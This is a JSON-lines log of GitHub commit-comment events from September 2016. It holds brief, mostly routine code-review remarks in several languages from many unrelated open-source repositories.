{"id":"4551480475","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990520,"position":5,"line":167,"path":"test/unit/response-mime.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:52:18Z","updated_at":"2016-09-12T19:52:18Z","body":"This fails currently, due to an issue with the Buffer construction. A deep dive will be needed to fix this."}},"created_at":"2016-09-12T19:52:18Z"}
{"id":"4551482752","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990530,"position":43,"line":219,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:52:40Z","updated_at":"2016-09-12T19:52:40Z","body":"Proper context binding."}},"created_at":"2016-09-12T19:52:40Z"}
{"id":"4551482911","type":"CommitCommentEvent","actor":{"login":"epsdky"},"repo":{"name":"epsdky/openemr"},"payload":{"comment":{"id":18990531,"position":null,"line":null,"path":null,"commit_id":"e41f87109e4e3467d7200b91801aecc66c58f6a2","created_at":"2016-09-12T19:52:41Z","updated_at":"2016-09-12T19:52:41Z","body":"This is an update to the description for the above commit...\r\n\r\nIf a recurrtype 3 (Days of Week) appointment is edited by unchecking a week day that corresponds to an individual appointment with date equal to pc_eventDate, an individual appointment corresponding to that weekday will persist (with date equal to pc_eventDate).\r\n"}},"created_at":"2016-09-12T19:52:41Z"}
{"id":"4551485868","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990538,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:53:12Z","updated_at":"2016-09-12T19:53:12Z","body":"The tests would fail without it."}},"created_at":"2016-09-12T19:53:12Z"}
{"id":"4551488464","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990545,"position":35,"line":181,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:53:38Z","updated_at":"2016-09-12T19:53:38Z","body":"I've tried, this was a more consistent solution."}},"created_at":"2016-09-12T19:53:38Z"}
{"id":"4551490054","type":"CommitCommentEvent","actor":{"login":"dkastner"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":18990548,"position":null,"line":null,"path":null,"commit_id":"a698c46373c615ee18b761d262215b725d0301b4","created_at":"2016-09-12T19:53:53Z","updated_at":"2016-09-12T19:53:53Z","body":"I don't think this tool should be wedded to any specific framework. What I'd like to see in the future is some kind of plugin system that would add support for frameworks, so `conductor new foo -f rails` would set appropriate variables as needed."}},"created_at":"2016-09-12T19:53:53Z"}
{"id":"4551490484","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990550,"position":24,"line":151,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:53:58Z","updated_at":"2016-09-12T19:53:58Z","body":"I believe this came from your commit."}},"created_at":"2016-09-12T19:53:58Z"}
{"id":"4551496017","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18990568,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-12T19:54:57Z","updated_at":"2016-09-12T19:54:57Z","body":"You don't need a CohortMemberDAO? When you got rid of CohortMemberService, you were supposed to get rid of CohortMemberDAO too, everything should be in CohortService and CohortDAO"}},"created_at":"2016-09-12T19:54:57Z"}
{"id":"4551500979","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18990582,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T19:55:49Z","updated_at":"2016-09-12T19:55:49Z","body":"TELL ME WHO IT IS!"}},"created_at":"2016-09-12T19:55:49Z"}
{"id":"4551501244","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18990584,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-12T19:55:51Z","updated_at":"2016-09-12T19:55:51Z","body":"Have you looked at https://wiki.openmrs.org/x/KYOfAw?"}},"created_at":"2016-09-12T19:55:51Z"}
{"id":"4551501299","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990585,"position":5,"line":179,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T19:55:51Z","updated_at":"2016-09-12T19:55:51Z","body":"Okay, I can shift it to the outside."}},"created_at":"2016-09-12T19:55:51Z"}
{"id":"4551501907","type":"CommitCommentEvent","actor":{"login":"jafetmorales"},"repo":{"name":"jafetmorales/bruce"},"payload":{"comment":{"id":18990586,"position":null,"line":null,"path":null,"commit_id":"bd3100374c7516de78e537707908d198a88692d6","created_at":"2016-09-12T19:55:57Z","updated_at":"2016-09-12T19:55:57Z","body":"Updated my fork"}},"created_at":"2016-09-12T19:55:57Z"}
{"id":"4551504167","type":"CommitCommentEvent","actor":{"login":"zombieisgodata"},"repo":{"name":"creativecommons/list"},"payload":{"comment":{"id":18990594,"position":4,"line":58,"path":"app/TheListApp/app/src/main/res/layout/fragment_my_list.xml","commit_id":"d72ded36deee9fe94fa9dbfd97d8498e4fd355c5","created_at":"2016-09-12T19:56:22Z","updated_at":"2016-09-12T19:56:22Z","body":"G\r\nE\r\nT\r\n/\r\nv\r\n1\r\n/\r\ne\r\nn\r\n.\r\nw\r\ni\r\nk\r\ni\r\np\r\ne\r\nd\r\ni\r\na\r\n.\r\no\r\nr\r\ng\r\n/\r\np\r\na\r\ng\r\ne\r\ns\r\n/\r\nF\r\no\r\no\r\n/\r\nh\r\nt\r\nm\r\nl\r\nP\r\na\r\nr\r\ns\r\no\r\ni\r\nd\r\nM\r\ne\r\nd\r\ni\r\na\r\nW\r\ni\r\nk\r\ni\r\nM\r\na\r\nt\r\nh\r\no\r\ni\r\nd\r\n \r\nG\r\nl\r\no\r\nb\r\na\r\nl\r\nr\r\ne\r\nq\r\nu\r\ne\r\ns\r\nt\r\nh\r\na\r\nn\r\nd\r\nl\r\ne\r\nr\r\ns\r\n \r\n/\r\nv\r\n1\r\n/\r\n{\r\nd\r\no\r\nm\r\na\r\ni\r\nn\r\n}\r\n/\r\n_\r\ns\r\ne\r\nr\r\nv\r\ni\r\nc\r\ne\r\ns\r\n/\r\nm\r\ne\r\nd\r\ni\r\na\r\nw\r\ni\r\nk\r\ni\r\n/\r\n \r\n/\r\nv\r\n1\r\n/\r\n{\r\nd\r\no\r\nm\r\na\r\ni\r\nn\r\n}\r\n/\r\n_\r\ns\r\ne\r\nr\r\nv\r\ni\r\nc\r\ne\r\ns\r\n/\r\np\r\na\r\nr\r\ns\r\no\r\ni\r\nd\r\n/\r\n \r\n/\r\nv\r\n1\r\n/\r\n{\r\nd\r\no\r\nm\r\na\r\ni\r\nn\r\n}\r\n/\r\n_\r\ns\r\ne\r\nr\r\nv\r\ni\r\nc\r\ne\r\ns\r\n/\r\no\r\nc\r\ng\r\n/\r\n \r\n/\r\nv\r\n1\r\n/\r\n{\r\nd\r\no\r\nm\r\na\r\ni\r\nn\r\n}\r\n/\r\n_\r\ns\r\ne\r\nr\r\nv\r\ni\r\nc\r\ne\r\ns\r\n/\r\nm\r\na\r\nt\r\nh\r\no\r\ni\r\nd\r\n/\r\nP\r\na\r\ng\r\ne\r\nc\r\no\r\nn\r\nt\r\ne\r\nn\r\nt\r\nB\r\nu\r\nc\r\nk\r\ne\r\nt\r\nR\r\nE\r\nS\r\nT\r\nB\r\na\r\ns\r\ne\r\nW\r\ne\r\nb\r\nO\r\nC\r\nG\r\nK\r\ne\r\ny\r\n-\r\nV\r\na\r\nl\r\nu\r\ne\r\nB\r\nu\r\nc\r\nk\r\ne\r\nt\r\nA\r\nu\r\nt\r\nh\r\n{\r\no\r\nr\r\ni\r\nz\r\n,\r\ne\r\nn\r\nt\r\ni\r\nc\r\n}\r\na\r\nt\r\ni\r\no\r\nn\r\nR\r\nE\r\nS\r\nT\r\nB\r\na\r\ns\r\ne\r\n-\r\nC\r\na\r\ns\r\ns\r\na\r\nn\r\nd\r\nr\r\na\r\nR\r\nE\r\nS\r\nT\r\nB\r\na\r\ns\r\ne\r\n-\r\nS\r\no\r\nm\r\ne\r\nD\r\nB\r\nT\r\na\r\nb\r\nl\r\ne\r\ns\r\nt\r\no\r\nr\r\na\r\ng\r\ne\r\nA\r\nP\r\nI\r\nA\r\nu\r\nt\r\nh\r\ns\r\ne\r\nr\r\nv\r\ni\r\nc\r\ne\r\nH\r\nT\r\nM\r\nL\r\nS\r\na\r\nn\r\ni\r\nt\r\ni\r\nz\r\ne\r\nr"}},"created_at":"2016-09-12T19:56:22Z"}
{"id":"4551504863","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"newluck77/fprsmap"},"payload":{"comment":{"id":18990599,"position":17,"line":37,"path":"js/main.js","commit_id":"4ae223217032e27f161ed16ce2cb0010068753b5","created_at":"2016-09-12T19:56:28Z","updated_at":"2016-09-12T19:56:28Z","body":"Sorry, I misread the first value of the array and did a mess in my head. You are totally right!\r\n\r\nQuick tests (run on the Fx's developer console, F12):\r\n* Without `initValue`:  `[1, 2].reduce(function sum(init, curr) { console.log(init, curr); return init + curr; });`\r\n* With `initValue`: `[2, 3].reduce(function sum(init, curr) { console.log(init, curr); return init + curr; }, 1);`"}},"created_at":"2016-09-12T19:56:28Z"}
{"id":"4551505055","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18990601,"position":null,"line":null,"path":null,"commit_id":"56dd76c4f29d9a36011c978d57be7e0483d66070","created_at":"2016-09-12T19:56:29Z","updated_at":"2016-09-12T19:56:29Z","body":"话说为什么我本地看着没问题，推上来过后缩进都乱了呢...."}},"created_at":"2016-09-12T19:56:29Z"}
{"id":"4551512038","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18990616,"position":48,"line":1234,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:57:46Z","updated_at":"2016-09-12T19:57:46Z","body":"I wasn't thinking of multi-threading. I was thinking of the buffer's contents between `ByteOrderFields` and `HostOrderFields`"}},"created_at":"2016-09-12T19:57:46Z"}
{"id":"4551512309","type":"CommitCommentEvent","actor":{"login":"airabinovich"},"repo":{"name":"airabinovich/java_petri_engine"},"payload":{"comment":{"id":18990617,"position":37,"line":37,"path":"src/Petri/PetriNetFactory.java","commit_id":"cc86d2f3c9f23e482d76eb8060f18a7063945823","created_at":"2016-09-12T19:57:49Z","updated_at":"2016-09-12T19:57:49Z","body":"petriNetType should be an enum type"}},"created_at":"2016-09-12T19:57:49Z"}
{"id":"4551515994","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18990641,"position":59,"line":1245,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:58:29Z","updated_at":"2016-09-12T19:58:29Z","body":"`LittleEndianFields` ? `FlatBufferOrderFields` ?"}},"created_at":"2016-09-12T19:58:29Z"}
{"id":"4551518583","type":"CommitCommentEvent","actor":{"login":"hardeath950"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18990646,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-12T19:58:59Z","updated_at":"2016-09-12T19:58:59Z","body":"@tecniques Cara, a opção \"use poke not to catch filter\" é um filtro para NAO pegar determinados pokemons listados na ultima tabela, voce mudando o IV abaixo vai entrar em conflito com a opção acima de usar Great e Ultra baseado em Chance de captura..."}},"created_at":"2016-09-12T19:58:59Z"}
{"id":"4551519327","type":"CommitCommentEvent","actor":{"login":"gwvo"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":18990652,"position":50,"line":1236,"path":"tests/test.cpp","commit_id":"3371c8aadb8615506dd177f85520f3a07eafdf10","created_at":"2016-09-12T19:59:08Z","updated_at":"2016-09-12T19:59:08Z","body":"Similarly, `ByteOrder` doesn't tell me much, since this will always make it big endian, right?"}},"created_at":"2016-09-12T19:59:08Z"}
{"id":"4546966546","type":"CommitCommentEvent","actor":{"login":"forrestv"},"repo":{"name":"uf-mil/rawgps-tools"},"payload":{"comment":{"id":18979195,"position":4,"line":4,"path":"rift_dk2_imu_driver/src/rift_dk2_imu_driver_nodelet.cpp","commit_id":"39fc8aad6b0152a0b1916e927fe134a42d29a495","created_at":"2016-09-12T02:00:15Z","updated_at":"2016-09-12T02:00:15Z","body":"hmm?"}},"created_at":"2016-09-12T02:00:15Z"}
{"id":"4546968195","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"mattyx14/otxserver"},"payload":{"comment":{"id":18979203,"position":null,"line":null,"path":null,"commit_id":"bded0d3158b51dceabeae52bcddec6109798e9f4","created_at":"2016-09-12T02:00:58Z","updated_at":"2016-09-12T02:00:58Z","body":"What? Have this on global?"}},"created_at":"2016-09-12T02:00:58Z"}
{"id":"4546968332","type":"CommitCommentEvent","actor":{"login":"ZCasey"},"repo":{"name":"ZCasey/ios_AppDemo"},"payload":{"comment":{"id":18979205,"position":null,"line":null,"path":null,"commit_id":"83e31229dbf729b49cc2fd957b233b134a431b98","created_at":"2016-09-12T02:01:02Z","updated_at":"2016-09-12T02:01:02Z","body":"赵争"}},"created_at":"2016-09-12T02:01:02Z"}
{"id":"4546971662","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979212,"position":4,"line":48,"path":"en/source/link_aggregation.rst","commit_id":"ca36a1c6d774805297aa60a82dcfd30166f30687","created_at":"2016-09-12T02:02:40Z","updated_at":"2016-09-12T02:02:40Z","body":"口頭でもお話しましたが、この修飾を削除しても、影響が無いのか、確認をお願いいたします。"}},"created_at":"2016-09-12T02:02:40Z"}
{"id":"4546975463","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979215,"position":null,"line":null,"path":null,"commit_id":"ca36a1c6d774805297aa60a82dcfd30166f30687","created_at":"2016-09-12T02:04:29Z","updated_at":"2016-09-12T02:04:29Z","body":"```\r\ninclude <PATH>\r\n```\r\nというプログラム文があった際に\r\n<PATH> は include source path と呼ぶ方が自然のようです。"}},"created_at":"2016-09-12T02:04:29Z"}
{"id":"4546978548","type":"CommitCommentEvent","actor":{"login":"stefanpenner"},"repo":{"name":"eploko/broccoli-watchify"},"payload":{"comment":{"id":18979221,"position":null,"line":null,"path":null,"commit_id":"f8debb5d0c1672bae14bef802e93867c44b00216","created_at":"2016-09-12T02:06:01Z","updated_at":"2016-09-12T02:06:01Z","body":"s/deference/dereference ... i can't spell"}},"created_at":"2016-09-12T02:06:01Z"}
{"id":"4546986878","type":"CommitCommentEvent","actor":{"login":"rugrus"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":18979231,"position":null,"line":null,"path":null,"commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-12T02:09:57Z","updated_at":"2016-09-12T02:09:57Z","body":"it isn't showing Lapras on the map. (never) =/"}},"created_at":"2016-09-12T02:09:57Z"}
{"id":"4546987755","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18979232,"position":null,"line":null,"path":null,"commit_id":"88fc894a1975877630850ef1cca4b1c8f0bd3467","created_at":"2016-09-12T02:10:21Z","updated_at":"2016-09-12T02:10:21Z","body":"++"}},"created_at":"2016-09-12T02:10:21Z"}
{"id":"4546993243","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18979240,"position":null,"line":null,"path":null,"commit_id":"42535936bd4f6a4622263f73b01cb44de69fae8f","created_at":"2016-09-12T02:12:53Z","updated_at":"2016-09-12T02:12:53Z","body":"yay thanks"}},"created_at":"2016-09-12T02:12:53Z"}
{"id":"4546997569","type":"CommitCommentEvent","actor":{"login":"dalelotts"},"repo":{"name":"dangchison/angular-bootstrap-datetimepicker"},"payload":{"comment":{"id":18979250,"position":null,"line":null,"path":null,"commit_id":"276b80c27cfb61d3d1f8c64caffb5b8623d3410d","created_at":"2016-09-12T02:14:49Z","updated_at":"2016-09-12T02:14:49Z","body":"Can you tell me what are you using that required this change?  \r\n\r\nThis isn't valid per the package.json spec so I'm wondering what consumes it."}},"created_at":"2016-09-12T02:14:49Z"}
{"id":"4547004748","type":"CommitCommentEvent","actor":{"login":"xyklex"},"repo":{"name":"dkrimmer84/l10n_co_tax_extension"},"payload":{"comment":{"id":18979271,"position":null,"line":null,"path":null,"commit_id":"72bdcffc85f9a98ae887f901d0cf94c2f1056a2a","created_at":"2016-09-12T02:18:03Z","updated_at":"2016-09-12T02:18:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;T87a5R0u&#x2F;246-bug-retencion-en-la-fuente-devoluciones\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: Retencion en la Fuente - Devoluciones</a>"}},"created_at":"2016-09-12T02:18:03Z"}
{"id":"4547006733","type":"CommitCommentEvent","actor":{"login":"acook"},"repo":{"name":"acook/blacklight"},"payload":{"comment":{"id":18979276,"position":null,"line":null,"path":null,"commit_id":"82b324d761d77a123b16b2742339caeb1efdf70a","created_at":"2016-09-12T02:18:53Z","updated_at":"2016-09-12T02:18:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U7iyXXNW&#x2F;4-c-char-octet-type\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> C (Char&#x2F;oCtet) type</a>"}},"created_at":"2016-09-12T02:18:53Z"}
{"id":"4547006976","type":"CommitCommentEvent","actor":{"login":"jessecarterMOOSE"},"repo":{"name":"jessecarterMOOSE/PRARIEDOG"},"payload":{"comment":{"id":18979277,"position":28,"line":119,"path":"src/markers/EventMarker.C","commit_id":"6c88a3d6a58b11064f6df3dc9fbbcc464da65eca","created_at":"2016-09-12T02:18:58Z","updated_at":"2016-09-12T02:18:58Z","body":"my -> by"}},"created_at":"2016-09-12T02:18:58Z"}
{"id":"4547007317","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979278,"position":null,"line":null,"path":null,"commit_id":"07f36081a6cceb66cbfc74c01b5e4be79c4fbc73","created_at":"2016-09-12T02:19:09Z","updated_at":"2016-09-12T02:19:09Z","body":"```\r\nThis patch adds the descriptions to get mininet environment script from github.\r\n```\r\nでしょうか"}},"created_at":"2016-09-12T02:19:09Z"}
{"id":"4547007377","type":"CommitCommentEvent","actor":{"login":"acook"},"repo":{"name":"acook/blacklight"},"payload":{"comment":{"id":18979280,"position":null,"line":null,"path":null,"commit_id":"1346f25bcf92c5df2740748e6cb1f9934c3fade7","created_at":"2016-09-12T02:19:10Z","updated_at":"2016-09-12T02:19:10Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;U7iyXXNW&#x2F;4-c-char-octet-type\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> C (Char&#x2F;oCtet) type</a>"}},"created_at":"2016-09-12T02:19:10Z"}
{"id":"4547008407","type":"CommitCommentEvent","actor":{"login":"ICarlangasI"},"repo":{"name":"jean18/proyecto"},"payload":{"comment":{"id":18979281,"position":5,"line":5,"path":"Colores Filtro Verde","commit_id":"2a641628f702c3cb79c22de1c9f9a9887fc019e9","created_at":"2016-09-12T02:19:38Z","updated_at":"2016-09-12T02:19:38Z","body":"#O"}},"created_at":"2016-09-12T02:19:38Z"}
{"id":"4547013599","type":"CommitCommentEvent","actor":{"login":"zzqowen"},"repo":{"name":"zzqowen/New-project"},"payload":{"comment":{"id":18979287,"position":null,"line":null,"path":null,"commit_id":"8554cbc790808c9d620171939e1cde4e9bc555e7","created_at":"2016-09-12T02:21:51Z","updated_at":"2016-09-12T02:21:51Z","body":"rrrrrrrrrrr"}},"created_at":"2016-09-12T02:21:51Z"}
{"id":"4547014409","type":"CommitCommentEvent","actor":{"login":"ywjno"},"repo":{"name":"nutzam/nutz"},"payload":{"comment":{"id":18979288,"position":null,"line":null,"path":null,"commit_id":"2400bf1b11b37487ba0459a44163f0a3114a8a1a","created_at":"2016-09-12T02:22:13Z","updated_at":"2016-09-12T02:22:13Z","body":"他有个优先级的，gradle 比 maven 级别要高"}},"created_at":"2016-09-12T02:22:13Z"}
{"id":"4547015406","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979289,"position":16,"line":128,"path":"en/source/link_aggregation.rst","commit_id":"b95fa2ff8a9a3ae5e8adc4c9ce30eb3f79045da4","created_at":"2016-09-12T02:22:37Z","updated_at":"2016-09-12T02:22:37Z","body":"ここのコードブロックが、コメントアウトのように見えることを気にされてましたが、\r\n126行目を\r\n`.. code-block:: bash`\r\nに変更することで適切に表示できそうです。"}},"created_at":"2016-09-12T02:22:37Z"}
{"id":"4547016332","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18979291,"position":null,"line":null,"path":null,"commit_id":"50d195de185ba5cd605417ba4dbdd563e477203e","created_at":"2016-09-12T02:23:03Z","updated_at":"2016-09-12T02:23:03Z","body":"It's right! =)\r\nhttps://github.com/opentibia/server/blob/master/src/creature.cpp#L810"}},"created_at":"2016-09-12T02:23:03Z"}
{"id":"4547018242","type":"CommitCommentEvent","actor":{"login":"grimreaper"},"repo":{"name":"PCGen/pcgen"},"payload":{"comment":{"id":18979293,"position":null,"line":null,"path":null,"commit_id":"f451ff7694363d7d68ecf3dac548af9850e4e9f7","created_at":"2016-09-12T02:23:53Z","updated_at":"2016-09-12T02:23:53Z","body":"lets revert this. I managed to cause issues even though it worked previously. will debug later "}},"created_at":"2016-09-12T02:23:53Z"}
{"id":"4547021282","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18979295,"position":null,"line":null,"path":null,"commit_id":"6b8130d54d17ca9b6e4e047b6f8da15c3d88a8da","created_at":"2016-09-12T02:25:17Z","updated_at":"2016-09-12T02:25:17Z","body":"@jef-n , just saw the commit in master_2 too; for the record, reason why those were left behind in previous 2.x dev cycles was to avoid breaking plugins that would rely on the .png files. "}},"created_at":"2016-09-12T02:25:17Z"}
{"id":"4547024833","type":"CommitCommentEvent","actor":{"login":"sethbowers"},"repo":{"name":"sethbowers/MPR"},"payload":{"comment":{"id":18979297,"position":null,"line":null,"path":null,"commit_id":"7e6fcd0b2091a72db3d37e66acc7f6dd89434b7b","created_at":"2016-09-12T02:26:55Z","updated_at":"2016-09-12T02:26:55Z","body":"Good."}},"created_at":"2016-09-12T02:26:55Z"}
{"id":"4547032920","type":"CommitCommentEvent","actor":{"login":"MarceloMarcondes"},"repo":{"name":"plinionaves/curso-iniciando-ionic-2"},"payload":{"comment":{"id":18979301,"position":null,"line":null,"path":null,"commit_id":"e804dbe9b5419a8ea20cb07a258cefcb1ab001de","created_at":"2016-09-12T02:30:23Z","updated_at":"2016-09-12T02:30:23Z","body":"Acredito que o código para os botões de favori / listen / share esteja desatualizado."}},"created_at":"2016-09-12T02:30:23Z"}
{"id":"4547039774","type":"CommitCommentEvent","actor":{"login":"kylesferrazza"},"repo":{"name":"bthuilot/brycethuilot.com"},"payload":{"comment":{"id":18979310,"position":null,"line":null,"path":null,"commit_id":"0ee801e77754b8015235e4d4e5fd29de70c8d877","created_at":"2016-09-12T02:33:23Z","updated_at":"2016-09-12T02:33:23Z","body":"beautiful"}},"created_at":"2016-09-12T02:33:23Z"}
{"id":"4547041139","type":"CommitCommentEvent","actor":{"login":"kylesferrazza"},"repo":{"name":"bthuilot/Insurance-Auto-Mailer"},"payload":{"comment":{"id":18979312,"position":null,"line":null,"path":null,"commit_id":"816f608f4343375be1bc2f00c6d7db55e69a9840","created_at":"2016-09-12T02:33:45Z","updated_at":"2016-09-12T02:33:45Z","body":"yay ruby"}},"created_at":"2016-09-12T02:33:45Z"}
{"id":"4547042508","type":"CommitCommentEvent","actor":{"login":"andytuba"},"repo":{"name":"thybag/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":18979315,"position":null,"line":null,"path":null,"commit_id":"83cb422b2c24a79e779b4113ef7ac53ab0f7c0db","created_at":"2016-09-12T02:34:22Z","updated_at":"2016-09-12T02:34:22Z","body":":+1:"}},"created_at":"2016-09-12T02:34:22Z"}
{"id":"4547051061","type":"CommitCommentEvent","actor":{"login":"MasterOdin"},"repo":{"name":"Submitty/Submitty"},"payload":{"comment":{"id":18979351,"position":null,"line":null,"path":null,"commit_id":"41b414c9d6ddf3356379568c8a5613291341ecaa","created_at":"2016-09-12T02:37:16Z","updated_at":"2016-09-12T02:37:16Z","body":"You probably want to just use the constant `__DEFAULT_LATE_DAYS_STUDENT__` to do this (from [here](https://github.com/Submitty/Submitty/blob/master/TAGradingServer/toolbox/functions.php#L77))"}},"created_at":"2016-09-12T02:37:16Z"}
{"id":"4547054939","type":"CommitCommentEvent","actor":{"login":"ttjxuan"},"repo":{"name":"ttjxuan/datasciencecoursera"},"payload":{"comment":{"id":18979357,"position":null,"line":null,"path":null,"commit_id":"aa5c65c869078ae5fdbf248700487934d678cb56","created_at":"2016-09-12T02:38:51Z","updated_at":"2016-09-12T02:38:51Z","body":"first added"}},"created_at":"2016-09-12T02:38:51Z"}
{"id":"4547056352","type":"CommitCommentEvent","actor":{"login":"michabbb"},"repo":{"name":"michabbb/slack"},"payload":{"comment":{"id":18979358,"position":16,"line":16,"path":"src/CL/Slack/Resources/config/serializer/CL.Slack.Model.PinnedItemMessage.yml","commit_id":"30dc3c4c8160285715b841967592c52d3a59697c","created_at":"2016-09-12T02:39:27Z","updated_at":"2016-09-12T02:39:27Z","body":"TODO: set correct attach message model"}},"created_at":"2016-09-12T02:39:27Z"}
{"id":"4547059925","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18979361,"position":73,"line":73,"path":"ryu/app/simple_switch_stp_13.py","commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-12T02:41:04Z","updated_at":"2016-09-12T02:41:04Z","body":"試して無いですが、`simple_switch_13.SimpleSwitch13` を継承することで、\r\n`switch_features_handler`\r\n`add_flow`\r\nは、実装しなくても動くようになりませんか？\r\n\r\n何を気にしてかというと、\r\nOVS のバグが... という 52-58行目の記載が、`simple_switch_13` と二重管理になっており、\r\nかつ、古いので、あまり好ましくないので、可能な限り再利用したい、と思っているからです。"}},"created_at":"2016-09-12T02:41:04Z"}
{"id":"4547065886","type":"CommitCommentEvent","actor":{"login":"Starnite"},"repo":{"name":"Starnite/protein-systematic-characterization"},"payload":{"comment":{"id":18979371,"position":24,"line":31,"path":"experiments/20160805-mutagenesis/20160908-cpec.md","commit_id":"afe8e0c113fccbfdc35273a3d68943849de42405","created_at":"2016-09-12T02:43:54Z","updated_at":"2016-09-12T02:43:54Z","body":"Will do that tomorrow!"}},"created_at":"2016-09-12T02:43:54Z"}
{"id":"4547066942","type":"CommitCommentEvent","actor":{"login":"Zarkoix"},"repo":{"name":"FastFlowDebate/FastFlow"},"payload":{"comment":{"id":18979373,"position":null,"line":null,"path":null,"commit_id":"65f6d1424d049b825f3db936abf231d457f4b54b","created_at":"2016-09-12T02:44:26Z","updated_at":"2016-09-12T02:44:26Z","body":"can you remove the copy of main.js in the root folder you created in the last commit"}},"created_at":"2016-09-12T02:44:26Z"}
{"id":"4547067460","type":"CommitCommentEvent","actor":{"login":"tslmy"},"repo":{"name":"ckwatson/web_gui"},"payload":{"comment":{"id":18979374,"position":null,"line":null,"path":null,"commit_id":"d665f5ed45ec476c016831f51fc2e6fb47a01fc4","created_at":"2016-09-12T02:44:40Z","updated_at":"2016-09-12T02:44:40Z","body":"Ooops. \"Heroku\". Not \"Heroic\"."}},"created_at":"2016-09-12T02:44:40Z"}
